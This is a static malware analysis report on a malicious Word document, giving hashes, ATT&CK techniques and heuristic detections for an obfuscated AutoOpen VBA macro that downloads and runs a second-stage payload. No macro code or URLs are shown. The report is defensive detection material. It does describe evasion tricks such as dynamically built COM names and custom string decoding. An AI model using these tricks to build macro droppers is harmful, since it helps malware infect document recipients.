Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 73632eaa1e787944…

MALICIOUS

Office (OLE) / .DOC

80.0 KB Created: 2015-05-18 05:52:00 Authoring application: Microsoft Office Word First seen: 2022-10-05
MD5: c4f638d0f56c386c8abc1c7768ed4697 SHA-1: eb089627a47506240d40abe5b3b37fafb885e111 SHA-256: 73632eaa1e787944b0a3861e6193806c5d6c940f4baee44a3416092161937cd6
320 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1059.003 Windows Command Shell

The critical heuristic OLE_VBA_HTTP_DROP_EXEC indicates that the VBA macros download and save a file to disk. The critical heuristic OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER suggests an obfuscated auto-exec loader that uses CreateObject and Shell execution. The presence of an AutoOpen macro further supports the execution of malicious code upon opening the document. The script's intent is to download and execute a second-stage payload.

Heuristics 7

  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • ClamAV: Doc.Macro.ObfuscatedHeuristic-5931994-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ObfuscatedHeuristic-5931994-0
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
f42b93532b8632dcabe334d276df79ed4763e13c6b199681391dab06cd7ac0f5		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 6817 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.